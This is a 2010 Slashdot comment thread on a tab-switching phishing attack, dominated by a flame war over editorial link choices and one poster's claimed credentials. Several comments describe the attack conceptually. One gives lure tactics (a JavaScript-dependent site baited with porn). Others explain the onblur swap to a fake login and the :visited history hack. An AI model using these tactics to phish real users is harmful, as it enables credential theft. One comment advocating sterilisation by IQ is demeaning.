  AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site
  Without evidence to the contrary, it seems like they are just doing their jobs and selecting which source is best to link to for the subject at hand. This is not necessarily always the 'discoverer'. Sometimes a better summary, or a more well-known site indicates a better link.
  I feel that this is within the editors' discretion, so long as you are not able to provide tangible evidence of an alterior motive (such as financial gain); the editors of Slashdot deserve the benefit of the doubt, with regards to their motives.
  Nor is either one better than the other, imo @ least, editorially!
  In your opinion
  being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category
  You claim the foregoing, and yet, you are posting this anonymously, and not identifying yourself, or showing any cause that permits an unbiased reader to believe you actually possess credentials like that (other than you claim to have them).
  Of course, this casts suspicion that you probably don't actually have the credentials, or there is a catch, and you have something to hide.
  In any case, your credentials don't automatically make your opinion the correct one, they don't form a logical argument.
  I would expect someone who actually has these credentials to understand that much, that listing your accomplishments doesn't make your opinion correct, particularly on matters, those creds don't validate.
  Also, the Slashdot editors have some excellent credentials -- one of the most important ones, is, they are the editors of slashdot, and you are not.
  A CV with extensive experience in CS (Computer Security) or Management Information Systems, does not add up to editorial experience, for the slashdot audience.
3. Re:Slashdot's catering to its CRONIES? by Anonymous Coward · 2010-05-25 18:11 · Score: 0
  
  LOL, now you've done it, you've set APK off.
  So now we have two blog posts, one of them bothered to link the actual inventor of the exploit and one of them didn't bother to link anything but some flash video site, and the editor went with the guy with the links. Maybe krebs is giving a kickback, who knows?
  Both of the blog posts sucked, neither of them mentioned using :visited to pick a fake login page that would actually apply to the target, nor did they mention using javascript's import capability (<script src="..."> doesn't have "Same Source" restrictions on it) and detect whether the user had logged in and therefore might reasonably expect to see that their connection timed out and they'd need to log in again.
  Oh look, at least Krebs bothered to mention that there's a proof of concept now that kind of works on firefox even with NoScript by combining the css image :visited concept with a meta refresh: http://avivraff.com/research/phish/article.php?854817837
  But oh no, "editorially" this is totally not better than that other guy's post.
4. Re:Slashdot's catering to its CRONIES? by jwl17330536 · 2010-05-26 08:35 · Score: 1
  
  After reading this I'm not sure you are as qualified as you like to think! http://www.thorschrock.com/2008/05/19/how-to-respond-when-people-threaten-to-sue-you-on-the-web/
Use different profiles by mathemaniac · 2010-05-25 03:36 · Score: 1

Why not use different profiles with the -no-remote option? Even if you have multiple tabs open and multiple browser windows, have a profile for financial operations only, or whatever you want to protect and have a persona that is easily recognized for that purpose. Then browser history with personal finance history will not be exposed to your other browsing.
I'm with you man... apk by Anonymous Coward · 2010-05-25 03:39 · Score: 0

See my reply here to your "naysayers" -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794 & see my subject line above scamdetect.
APK
1. Re:I'm with you man... apk by scamdetect · 2010-05-25 04:26 · Score: 1
  
  support appreciated - thank you!
Re:Opera or Firefox with NoScript stops this attac by ShadowRangerRIT · 2010-05-25 03:42 · Score: 1

Except that so many websites are JavaScript dependent that temporarily allowing JS from a page is fairly common for all but the most paranoid. Design your malicious site to be unusable without JavaScript, 90% of NoScript users will at least temporarily whitelist it if the content is of sufficient interest; I recommend porn. When they quickly switch tabs so their bosses don't see the porno site, switch to a fake log-in screen.
Yeah, most people will catch it, but you aren't coding for most people. You're coding for dumbasses (or people ignorant of this exploit with little native skepticism), and even among NoScript users, I guarantee a few percent of them forget what they were doing, overlook the address bar, and rationalize the log-in screen by assuming they must have opened it and forgot about it, then remember something they needed to do and enter their log-in details.

--
$_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
Fairly easy to counter by jimbolauski · 2010-05-25 03:42 · Score: 1

So a page renders itself then waits until it's inactive then rerenders it won't take long for a patch.

--
Knowledge = Power
P= W/t
t=Money
Money = Work/Knowledge so the less you know the more you make
Brian Krebs is no more qualfied than you are man by Anonymous Coward · 2010-05-25 03:56 · Score: 0

Brian Krebs doesn't have a degree in CSC, CIS, or MIS (nor a CISSP or like computer security cert. to his credit (I just checked on this in fact, after I wrote the material I have here now and in the URL I put down below here, which was my original reply to your "naysayers" here)).
After all - Neither yourself, NOR BRIAN KREBS, are the discoverers of this material, so the date data is immaterial (don't berate yourself on that account spamdetect, yours is just as valid as his is, and, to be honest about it? I found YOURS easier to read (shorter & to the point)).
Here was my original reply to your naysayers, so, "drink it in, & digest it" -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794
APK
P.S.=> Others here in this very thread are also noting that slashdot's "editorial crew" (what exactly makes them expert in being professional editors anyhow, especially on the note of English & editorials? I bring that up in my URL above, & especially on the subject of computing no less) tends to "favor" their "crony" Brian Krebs here on this website, constantly it seems!
It's NOT just me saying it either, as it's also noted by others here as well on this very subject -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196 and it was uprated +1 already too, so... apk
Tabs are stupid by DrugCheese · 2010-05-25 03:59 · Score: 1

Ive never understood tabs myself. I already had tabs built into my operating system, they called it the taskbar. What's the vulnerability being attacked here anyway? I know of no way for content in one tab to insert content or even change the location of another tab ...

--
*DrugCheese rants*
1. Re:Tabs are stupid by Qzukk · 2010-05-25 17:25 · Score: 1
  
  I already had tabs built into my operating system, they called it the taskbar.
  Sure, if you have a task bar that takes up half the screen or you want to go through dozens of "tabs" that all say "Internet Ex..." At least firefox's default tab bar starts scrolling once there's too much to fit on one line without changing the title to "Sl..."
  What's the vulnerability being attacked here anyway?
  The User. BTW, this works on multiple windows too.
  I know of no way for content in one tab to insert content or even change the location of another tab ...
  It doesn't. Attacker convinces The User to click on example.com/evilsite/awwcutekitty.html which shows them a cute kitty. They think it's neat and they go to tweet it to their friends or whatever. Once they switch tabs (or windows) the onblur command replaces the cute kitty with a login screen, possibly one chosen using the :visited css hack so it looks like a site they actually use. They go back to where they thought the cute kitty was, and when the cute kitty isn't there anymore, they don't think "Hey my cat picture has been replaced by a gmail phishing site" they think "aww I must have closed it. Now I gotta log back into gmail to get the link again since my session timed out"
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
2. Re:Tabs are stupid by DrugCheese · 2010-05-26 05:42 · Score: 1
  
  It doesn't. Attacker convinces The User to click on example.com/evilsite/awwcutekitty.html which shows them a cute kitty. They think it's neat and they go to tweet it to their friends or whatever. Once they switch tabs (or windows) the onblur command replaces the cute kitty with a login screen, possibly one chosen using the :visited css hack so it looks like a site they actually use. They go back to where they thought the cute kitty was, and when the cute kitty isn't there anymore, they don't think "Hey my cat picture has been replaced by a gmail phishing site" they think "aww I must have closed it. Now I gotta log back into gmail to get the link again since my session timed out"
  That's what I thought, so really it's nothing at all to do with tabs per se. I'm a great multi-tasker, but I've never saw the benefit of having more than 4-5 open windows/tabs at once. Even if I'm doing some type of development online. It's much quicker, for me, to just open a new window and go to the new site I want to visit, even if I do it several times an hour. I close the window when I'm done and I know right were to access it again next time, by opening a new one ...
  
  --
  *DrugCheese rants*
Which "morons"? by wrencherd · 2010-05-25 04:00 · Score: 1

I think I'd want to have some kind of referendum on what "stupid" is before I'd agree to the whole sterilization thing.
And as far as natural selection taking care of stupidity, it much more often seems like the stupider one is the more their reproductive practice takes on a pattern similar to that of voting in Chicago: early and often.
1. Re:Which "morons"? by peragrin · 2010-05-25 04:17 · Score: 0, Troll
  
  anyone with an IQ under 100 would work just fine. Since that is half the population anyways it would be good for world wide population control too. If you want to be nice you can even throw in an average. You can take the test 3 times and they average your score.
  Bonus it would limit the influence of religion as most conservatives, and religious idiots are under 100 IQ points anyways, and those that are above it while holding their beliefs actually can be reasoned with.
  
  --
  i thought once I was found, but it was only a dream.
sending passwords to a "new" site by ftobin · 2010-05-25 04:23 · Score: 1

I don't see why it would be so hard for Firefox to simply report to the user a warning when they begin to send a particular password to a "new" site, one that they haven't sent a password to before, and even more-so if the password is generally sent to another site.
I think this solution fits the problem well, as you're trying to prevent yourself from sending passwords to places that shouldn't get them.
Never.. by speroni · 2010-05-25 04:33 · Score: 1

.. leave your bank tab open and walk away.
Sure I'll leave facebook or gmail open, but there's limited damage that can happen from someone hacking them.
Also for some reason i usually have two windows open, one for "serious business" where gmail is the first tab, facebook is the second tab, then what ever else i happen to be looking at in the other tabs. Then in a whole other window there's the random youtube, flash games and stumble upon results. Always keeping facebook and gmail in the same tabs limits the chances of me being tricked by this by anything i regularly log into. WTF is gmail doing all the way over here!?

--
Eschew Obfuscation
Does Brian Krebs have a CISSP or A.A.S/B.S. in CSC by Anonymous Coward · 2010-05-25 04:37 · Score: 0

No to the above... now, as to what YOU stated? OK:

"Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot." - by mcgrew (92797) * on Tuesday May 25, @10:18AM (#32335816)
http://it.slashdot.org/comments.pl?sid=1664046&cid=32336794 in my original reply here (thanks for the "+1 mod up" to whomever up modded my post here, because it's a serious rarity for us AC's to get EVEN THAT level of moderation upwards, considering our posts are often buried because we're not foolish enough to register here to be easily tracked for trolling registered users and the fact that we start at ZERO/0 mod points)!
I said that in that URL above because I agree (along with many others here such as this one, also moderated upwards here for the same basic points I made in my URL above -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196 ) that spamdetect was done wrong by the editors here, and his asking that his original data link as the source be reinstated (or, at least, co-posted as a secondary substantiating source).
APK
P.S.=> Kindly show ANY OF US, that Brian Krebs has a CISSP, or an A.A.S./B.S., masters or PHD in CIS, MIS, CSC or other computer sciences related disciplines (plus an English degree to his name also) that qualifies him as "better or more expert" on the subject of computing (specifically security would help even more)? Then, we'll listen... otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type (a crony/sycophant/bootlicker, if not one of the mods/owners here defending himself via alternate logons (if you guys do NOT think this occurs on websites? LOL, boy... are you naive!))... apk
You FAIL logic (appeal to incorrect authority) by Anonymous Coward · 2010-05-25 05:32 · Score: 0

Have YOU even passed a formally administered LOGIC course? I think not, and it's because you're appealing to an incorrect authority (a major logical fallacy tenet in fact, on your part, lol).

"It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education. Krebsonsecurity is better, if for no other reason that it is better known." - by NeutronCowboy (896098) on Tuesday May 25, @01:06PM (#32338036)
Ahem: I actually took, and did fairly well, @ LOGIC while in academia, have you? Obviously not, and all your name calling's only showing that's the "best you've got" (but no coursework in logic to your credit obviously, other than the "pseudo logic" used on forums, lol!)
(Obviously you have not taken LOGIC on YOUR part, and certainly not in CSC, because if you did, you'd realize it's commonly a requirement for said degree (At least in the "best schools" which are typically found in the North East United States and that's where I took both my degrees!))
You failed, and why? Because of what you used... in LOGIC, using what you have is called (so you know) an "appeal to an incorrect authority"!
Calling Brian Krebs somekind of expert or authority on this arena of computer sciences? A mistake, and a huge LOGICAL one!
(Krebs has nothing to his credit in this science in degrees that establish his expertise according to educational standards, and I also DOUBT STRONGLY he has put in his "time in the trenches" either in Computer Security, Networking, OR PROGRAMMING as well which might help establish he as more of an "authoritative figure").
You? LOL, my man... I have to thank you, for defeating YOURSELF ON THE VERY GROUNDS YOU USE YOURSELF:
You just failed a major tenet of logic, in your "appeal to incorrect authority" by the way, because Brian Krebs is by no means, an authoritative figure in this science, let alone the specific niche in computer security (he's more of a hobbyist, and thus, no more qualified than scamdetect here is)...
However, since you critiqued ME? See this list, show me you (or Krebs) have done more or better in this field:
"My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."
----
Windows NT Magazine (now Windows IT Pro) April 1997 "BACK OFFICE PERFORMANCE" issue, page 61
(&, for work done for EEC Systems/SuperSpeed.com on PAID CONTRACT (writing portions of their SuperCache program increasing its performance by up to 40% via my work) albeit, for their SuperDisk & HOW TO APPLY IT, took them to a finalist position @ MS Tech Ed, two years in a row 2000-2002, in its HARDEST CATEGORY: SQLServer Performance Enhancement).
WINDOWS MAGAZINE, 1997, "Top Freeware & Shareware of the Year" issue page 210, #1/first entry in fact (my work is there)
PC-WELT FEB 1998 - page 84, again, my work is featured there
WINDOWS MAGAZINE, WINTER 1998 - page 92, insert section, MUST HAVE WARES, my work is again, there
PC-WELT FEB 1999 - page 83, again, my work is featured there
CHIP Magazine 7/99 - page 100, my work is there
GERMAN PC BOOK, Data Becker publisher "PC Aufrusten und Repairen" 2000, where my work is contained in it
HOT SHAREWARE Numero 46 issue, pg. 54 (PC ware mag from Spain), 2001 my work is there, first one featured, yet again!
Also, a British PC Mag in 2002 for many utilities I wrote, saw it @ BORDERS BOOKS but didn't buy it... by that point, I had moved onto other areas in this field besides coding only...
Lastly, being paid for an article that made me money over @ PCPitstop in 2008 for writing up a guide that has people showing NO VIRUSES/SPYWARES & other screwups, via following its point, such as THRONKA sees here -> http://www.xtreme
1. Re:You FAIL logic (appeal to incorrect authority) by NeutronCowboy · 2010-05-25 08:03 · Score: 1
  
  "My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."
  Oh the bold lettering, the all-caps, the irony that is the quote... Your post wouldn't be nearly so hilarious without it. Thanks again for a good laugh.
  By the way Andrew, let me know when you get a citation for an article in a peer-reviewed journal that is at least semi-recent. It'll make the copy-pasting of your minimal accomplishments that much more entertaining.
  
  --
  Those who can, do. Those who can't, sue.
Rich web experience requires vigilance by users by rjamestaylor · 2010-05-25 05:56 · Score: 1

As the richness of the web experience increases due to interactive technologies available on the client-side unscrupulous people work to catch people off-guard for their own advantage. At the most benign level this is done by advertisers seeking to gain attention. At the worst thieves use client-side scripting as a virtual pickpocket tool.
When possible I remind my family members to stay on alert when on-line (or even off-line). This includes not clicking on links in email, of course. It also includes not logging into a service unless they have entered the URL themselves or used a bookmark they have set up. Yes, this does not prevent MitM attacks and will not protect them from a scheme that changes a browser's bookmarks. But it solves the bulk of the phishing attacks to date.
One reason I prefer specialized apps for important services (banking, on-line status update services, email) over using a generic web interface is that specialized apps are less prone to be faked by XSS, phishing look-a-like pages, etc. This is especially true of closed platform apps like iPhone/iPad apps that undergo an approval process by a third party.
Sad as it is to admit one benefit to the lack of "freedom" on the iPhone/iPad platform is protection from scammers.
What is an open alternative to protecting the unaware from these scams? I'm all ears.

--
-- @rjamestaylor on Ello
So by Anonymous Coward · 2010-05-25 06:24 · Score: 0

So don't use tabs..."tabbed browsing" sucks anyway.
Re:Does Brian Krebs have a CISSP or A.A.S/B.S. in by mcgrew · 2010-05-25 06:34 · Score: 1
otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type
Ok, I'll clear up a few things:
1. My subscription was paid by an anonymous donor who probably enjoys my journals, although I'm glad I have it
2. Check the "achievements" page and you'll see "the comedian", which means I make joke comments often enough to get "+5 funny"s despite the danger of making funny comments ("funny" gains no karma yet is often modded troll or flamebait)
3. I very often argue (albeit politely) with Pudge, an admin here, whose politics don't often agree with mine
4. None of my own submissions link anything I've written
Yes, there are people with alternate logons; but I've had exactly two; this one, and when when I lost my password for a time used this one. One would think that a person would friend alterate identities; you really think I have over 200 alternate identities?
The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can.
As to "mods", I post too often to get mod points (although I get metamod points).
we're not foolish enough to register here to be easily tracked for trolling registered users
Too bad you're not registered, because you'll probably not see my reply. That's an advantage of being logged on -- you're informed of replies to your comments and can have an intelligent conversation with people way more knowledgable and intelligent than me; one of the great things about this site is you can actually LEARN stuff sometimes from some of the comments. Scientists from all sorts of disciplines, engineers, designers, from all over the world post here. You're not going to find discussions like you see here at DIGG, or anywhere else for that matter.
--
Free Martian Whores!
Additionally? See your quote on BLOGS (Krebs, IS) by Anonymous Coward · 2010-05-25 08:29 · Score: 0

Requoting you, on blogs, per my subject line:

"Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot." - by mcgrew (92797) * on Tuesday May 25, @10:18AM (#32335816)
First of all, "Krebs on Security"? It's a BLOG, correct? I'm pretty sure it is, so you either are joking or are contradicting yourself...

"Yes, there are people with alternate logons; but I've had exactly two; this one, and when when I lost my password for a time used this one. One would think that a person would friend alterate identities; you really think I have over 200 alternate identities?" - by mcgrew (92797) * on Tuesday May 25, @02:34PM (#32339464)
Thanks for making my point, that's a possibility (others are for others that 'support themselves' via multiple alternate logons as registered users too are another though, & that's what I allude to actually)... there is also another case you omit: WHEN SLASHDOT MODERATORS HERE DELETE OTHERS' ACCOUNTS TOO, AS NOTED HERE:
----
http://slashdot.org/comments.pl?sid=1640368&cid=32155438

"so if you try to block all of my posts like the other one that are here then every thing i have heard about the moderators is true and all of the Slashdot moderators is nothing but a bunch of losers that can not handle the truth, and if you think taking my account and destroying kingersjokwers was going to stop me from posting the facts then you are out of your mind" - by kingsjokers (1808300) on Monday May 10, @10:52AM (#32155438)
----

"The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can." - by mcgrew (92797) * on Tuesday May 25, @02:34PM (#32339464) Journal
Same here, but, when I see the likes of what is in bold above, and whats gone on with spamdetect here too and his posting being altered to cater to what appears to be a 'crony' (or, shall we say "affliate", lmao) site for this one, & I'm not the only one noting it here either, this person has as well -> with the same sentiment.
When I see /. mods:
1.) Unfairly apparently burning others accounts, stopping them from submitting posts or points in doing so:
http://slashdot.org/comments.pl?sid=1640368&cid=32155438

"so if you try to block all of my posts like the other one that are here then every thing i have heard about the moderators is true and all of the Slashdot moderators is nothing but a bunch of losers that can not handle the truth, and if you think taking my account and destroying kingersjokwers was going to stop me from posting the facts then you are out of your mind" - by kingsjokers (1808300) on Monday May 10, @10:52AM (#32155438)
2.) Trying to do the same to others (or, lol, TRYING to & failing, lol -> http://slashdot.org/comments.pl?sid=1640368&threshold=-1&commentsort=0&mode=thread&pid=32085128 as they did with myself & others too there)
3.) Then the mods here also stopping threads early when the mods/owners or their pals "bit off more than they could chew" with facts vs. their fictions (soppsa & red flayer mods here afaik (red says he is, soppsa I am NOT 110% sure of though))?
"Germany warns users against Firefox" here http://slashdot.org/comments.pl?sid=1640368&cid=32111672
They closed a thread 2 weeks early there, last month, on Firefox vs. Opera where I debated it with a user here named clone53421.
Let's place the blame where the blame is due. by penguinman1337 · 2010-05-25 08:36 · Score: 1

Damn you Opera! If you hadn't invented tabbed browsing, none of this would have happened!!
Where's your "LOGIC" (illogic is more like it) NOW by Anonymous Coward · 2010-05-25 08:41 · Score: 0

?
Answer the question above in my subject-line & of course, where you tried your "ILLOGIC LOGIC" on me, here, trying to pitifully 'troll' me -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32338386 ... lol!
(Take a course in logic, won't you, first, before trying to tell us how "logic works", lol!)
APK
P.S.=> Windows IT Pro magazine which I had work featured in that I made better by up to 40% due to work on block device driver parameterization & data placements + more?
Well, lol, IT IS TRULY, a "review by peers", because in case you haven't noticed?? Dr. Mark Russinovich, PHD, of Microsoft writes for them...
(So you know: What is/was "Windows NT Mag" where my works featured while you were still in diapers?? It is the forerunner of "Windows IT Pro" mag)...
Also, when you can show you have code in commercial products as I do, well... especially ones that have done really well (such as at Microsoft Tech Ed 2000-2002 as a finalist in its HARDEST CATEGORY, 2 yrs. in a row, & again, most likely whilst you were in diapers (again, lol))??
When you can evidence more than 16++ yrs. of professional experience in this field coding, network engineering, and far more in as I can???
Well... then, & ONLY THEN, can you talk as you have to me, especially your first reply!
(QUESTION - Do you have a degree in CSC or CIS/MIS even? Your outright laughable blunder on logic evidences otherwise, lol, in your initial post (per my subject-line))...
So all the name tossing in the world & attempts @ "sly ridicule" (is your fav. color 'transparent' or what)? Useless, & again, especially what you said about me initially calling me a "nincompoop" (the last resort of the troll usually is name tossing by the by), when I am actually a someone who HAS TAKEN, & DONE WELL IN, LOGIC FORMALLY IN COLLEGIATE ACADEMIA?
LOL, you blew that too, badly, by your fail in the use of "appeal to an incorrect authority", lol, while trying to tell ME my logic was poor! You, obviously, only know "forums 'illogic logic'" (as Tom Baker as Dr. Who called it, lol, "illogic logic")!
Hilarious, & again: "too, Too, TOO EASY!"... just too easy! apk
Re:Where's your "LOGIC" (illogic is more like it) by NeutronCowboy · 2010-05-25 09:04 · Score: 1

Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny.

--
Those who can, do. Those who can't, sue.
More predictable namecalling, last resort o trolls by Anonymous Coward · 2010-05-25 09:24 · Score: 0

"Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny." - by NeutronCowboy (896098) on Tuesday May 25, @05:04PM (#32341426)
Well, see subject-line above, & I could not fit in the ENTIRE truth of it, in "DEFEATED TROLLS" (regarding yourself, a self-defeating troll, lol, no less)
I mean, hey: Your "illogic logic" here, lol -> http://it.slashdot.org/comments.pl?sid=1664046&cid=32338386 was utterly hilarious!
(That URL above's for others reading here, because NeutronCowboy "nuked himself" right out of the gate, lol, on LOGIC (never even haven taken it himself, failing badly in logic no less himself via "appeals to an incorrect authority", AND LASTLY, He obviously never has taken logic (or the topic of this thread, in Computer Sciences related material) academically either because CSC demands usually you take LOGIC... All the while, with "Nuked Cowboy" (lol) here blowing it on that too, & yet attempting to berate + ridicule me who has in academia during CSC degrees work here, & myself actually having done well academically @ LOGIC courses no less too)).
Man - "Nuff said", & "too, Too, TOO EASY" about 'sums it up' for me in that URL above... lmao!
APK
P.S.=> By the way, the initial "nincompoop" insinuation you literally stated & tried to direct MY way, especially regarding having taken LOGIC (when I have)? Hilarious, but you also violating a tenet of logic in your misuse of "appeal to an incorrect authority" clearly evidences that now all you have is your name calling... the LAST RESORT of the fallen troll, everytime! apk
Banking (etc) in Freshly opened windows only by IBitOBear · 2010-05-25 13:24 · Score: 1

The real smart users don't do "real things" via "go back" or "left open" windows. When I bank etc, I use a freshly opened window (if not always browser, but one can only by so paranoid) opened with file-new not ctrl-n etc. Then I do my business and get out.
Sure my slashdot.org and my social and dating site kinda crap stays logged in, but so what.
If it's real business I don't go there unless I typed the URL by hand. I don't even bookmark the sites for my bank and credit card etc because _I_ have been expecting the bookmark rewriting attack as more likely than tab reassignment. But who am I to judge...

--
Innocent people shouldn't be forced to pay for inferior software development.
--"Code Complete" Microsoft Press
People aren't stupid, others see the same by Anonymous Coward · 2010-05-25 15:57 · Score: 0

"You have evidence of this accusation against the integrity of Slashdot's Editors and (therefore) the Slashdot site itself?" - by mysidia (191772) on Tuesday May 25, @08:48PM (#32343692)
Per my subject line above? This is only a SMALL SAMPLE from this thread where others have noted the same (see url below, it's another respondent here stating that /. tends to "favor" KrebsOnSecurity, because of the mods directing traffic to B. Krebs blog, via altering the original submission for story by the poster scamdetect):
http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196
Nuff said (& I didn't say it either that time, so, good enough for you? It ought to be, & there are others like it here as well besides his statement there).
----

"You claim the foregoing, and yet, you are posting this anonymously, and not identifying yourself, or showing any cause that permits an unbiased reader to believe you actually possess credentials like that (other than you claim to have them)." - by mysidia (191772) on Tuesday May 25, @08:48PM (#32343692)
OH, I suppose for the first item in this list, you could email Mr. Eric Dickman (CEO of SuperSpeed.com, a certified Microsoft Partner) in regards to paid work I ended up doing for his company as EEC Systems back in 1996 that made their SuperCache/SuperCache II block device driver level diskcache up to 40% better for example (easiest one for you to verify I guess would be that, from this list below):
"My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."
----
Windows NT Magazine (now Windows IT Pro) April 1997 "BACK OFFICE PERFORMANCE" issue, page 61
(&, for work done for EEC Systems/SuperSpeed.com on PAID CONTRACT (writing portions of their SuperCache program increasing its performance by up to 40% via my work) albeit, for their SuperDisk & HOW TO APPLY IT, took them to a finalist position @ MS Tech Ed, two years in a row 2000-2002, in its HARDEST CATEGORY: SQLServer Performance Enhancement).
WINDOWS MAGAZINE, 1997, "Top Freeware & Shareware of the Year" issue page 210, #1/first entry in fact (my work is there)
PC-WELT FEB 1998 - page 84, again, my work is featured there
WINDOWS MAGAZINE, WINTER 1998 - page 92, insert section, MUST HAVE WARES, my work is again, there
PC-WELT FEB 1999 - page 83, again, my work is featured there
CHIP Magazine 7/99 - page 100, my work is there
GERMAN PC BOOK, Data Becker publisher "PC Aufrusten und Repairen" 2000, where my work is contained in it
HOT SHAREWARE Numero 46 issue, pg. 54 (PC ware mag from Spain), 2001 my work is there, first one featured, yet again!
Also, a British PC Mag in 2002 for many utilities I wrote, saw it @ BORDERS BOOKS but didn't buy it... by that point, I had moved onto other areas in this field besides coding only...
Lastly, being paid for an article that made me money over @ PCPitstop in 2008 for writing up a guide that has people showing NO VIRUSES/SPYWARES & other screwups, via following its point, such as THRONKA sees here -> http://www.xtremepccentral.com/forums/showthread.php?s=ee926d913b81bf6d63c3c7372fd2a24c&t=28430&page=3
----
What do I have to say about that much above? I can't say it any better, than this was stated already (from the greatest book of all time, the "tech manual for life" imo):
"But by the grace of God I am what I am: and his grace which was bestowed upon me was not in vain; but I labored more abundantly than they all: yet not I, but the grace of God which was with me." - Corinthians Chapter 10, Verse 10
(And, because I got LUCKY to ha
Name tossing? A logical fallacy again by you by Anonymous Coward · 2010-05-25 16:21 · Score: 0

"Ah.... the moral relativism argument. How do I miss thee.... wait, I don't. It's guaranteed to be brought up by some nincompoop who missed Logic and Philosophy in his education." - by NeutronCowboy (896098)
on Tuesday May 25, @01:06PM (#32338036)
Funny how you won't show you have taken, and passed, a formal logic course... because you obviously have not, per the below evidences thereof and your own poor showing in the use of logic in debate!
LOL, not only did you:
1.) "Appeal to an incorrect authority" (another logical fallacy, because B. Krebs whom slashdot moderators unjustly altered scamdetect the story submitters post here for with one of their own sources? IS an unqualified one no less (because B. Krebs has no CSC, or CIS/MIS degrees, industry hands on experience in the trenches in networking, programming, OR SECURITY, nor does he have a CISSP cert. to his name either - he's really no authority on this subject because of the lack of those things showing he is)!
2.) You're now, and originally as well from the onset of your replies to me here, also resorting to this logic fallacy as well (failing badly yet again & yet you said what you did above? Please...):
Ad Hominem This is committed when we attack a person and not his arguments.
(More evidence to that, directed my way in your name calling attacks & insinuations (as well as your delusions of grandeur, lol, in imagining yourself a licensed practicing psychiatrist as well no less apparently based on what you state below) from you exists below in this quote as well)

"I don't know if it is the foaming-at-the-mouth superiority complex" - by NeutronCowboy (896098)
on Tuesday May 25, @01:06PM (#32338036)
Ahem: Care to produce your PHD in Psychiatry, as well as your license to practice it? Have you performed a formal evaluation of myself in professional settings as well to make your "prognosis/diagnosis", Dr. Quack? No to all of the above???
Thought so. You're libeling me if you don't have those things you know...
(By the way? Thanks for the (sort of) "Freudian Slip", in your basically insinuating you feel I am "superior" - you give away a lot, & I strongly suggest you never, EVER play poker... you tip your hand & show your tell, way too easily!)
APK
P.S.=> LOL, all in all: You should not have brought logic into this, name calling & all as you have (directing it my way), because you've failed on those grounds, HUGELY, no less... lmao! You chose your nickname/handle here, you are truly, The "NUKED COWBOY" (because the flames & smoke from your 'showing' here? Man, they're POURING off of you know, because of it)... apk
still the same by Anonymous Coward · 2010-05-25 18:41 · Score: 0

It still all boils down to the fact of clicking on a suspect website link...
Dont click on dodgy links -->and you have no issues!
Looks like I got it wrong by scamdetect · 2010-05-26 00:33 · Score: 0

Perhaps I have misjudged the purpose of the Slashdot website and perhaps I owe it's creators/owners/moderators an apology. It appears that whilst relying upon user input for its existence (and the time said users take to craft meaningful and useful content) it is the prerogative of the owners to take said content and rewrite it in the interests of the reader. As a blogger, I find this concept difficult to understand as when guest bloggers or contributors provide content for my website, I ensure that their links are preserved as written to give them the benefit of subsequent referral traffic. I had not realised that the courtesy of reciprocity did not apply to slashdot contributors. For my ignorance in this matter, I apologise.
Not "set off" here: Just "righteously indignant by Anonymous Coward · 2010-05-26 01:15 · Score: 0

"LOL, now you've done it, you've set APK off." - by Anonymous Coward on Wednesday May 26, @02:11AM (#32345400)
Per my subject above, I'm far from "set off": I just feel the same "righteous indignation" that scamdetect does, because the moderators here have LITERALLY tried to 'snuff out' my ability to post here a few times (and they failed at it, & quit doing it), and I do not mean the "10 posts per 24 hour limit" that is imposed on those of us that post as "anonymous coward" (better than being an easily tracked for getting trolled registered user imo - because I've got my own "little fanclub" of trolls online and here that try to 'get my goat' that way, & doing AC posts here protects me from that type of thing occurring is all. Otherwise, I'd be a registered user here!)...
The mods here also have closed threads way, Way, WAY earlier than normal as well when I was getting the better of one of their cronies/pals in clone53421 (when I showed that Firefox had 3 security vulnerability errors in 1 week's time and Opera had ZERO & is just plain faster and has more features "built in natively" by far, than Firefox does (with less vulnerabilities than FF addons do also historically)).
I just do NOT like what I feel are "injustices done" online, or otherwise. A lot of folks keep their mouths shut and stay out of things, & many times I do the same - this is not one of those times though, because I know how it feels.
So, do I understand HOW scamdetect feels, when the mods here altered his story submission posting to point to a "crony" of theirs, vs. using the source scamdetect posted?
Absolutely.
That's VERY UNPROFESSIONAL EDITORIAL WORK, and with obvious "ulterior motives" also... & I am not the only person who felt that way here (scamdetect certainly did, that's no secret, but there are others here who saw the same as I as well, a list of their posts are below in url linkage form in this very thread):
http://it.slashdot.org/comments.pl?sid=1664046&cid=32335196
http://it.slashdot.org/comments.pl?sid=1664046&cid=32334930
http://it.slashdot.org/comments.pl?sid=1664046&cid=32335816
http://it.slashdot.org/comments.pl?sid=1664046&cid=32336338
(Want more? Folks in those posts are noticing how OFTEN slashdot's "editorial staff" here link to B. Krebs BLOG, and he has no more qualifications than does the story submitter in this area, Computer Sciences and specifically of a security-oriented focus (hell, I have more under my belt BY FAR than Mr. Krebs does, which only shows that the editors of /. have chosen a source that's really NOT that "expert" or "credible" (albeit, to Krebs' credit, he doesn't CLAIM TO BE AN EXPERT @ least)).
APK
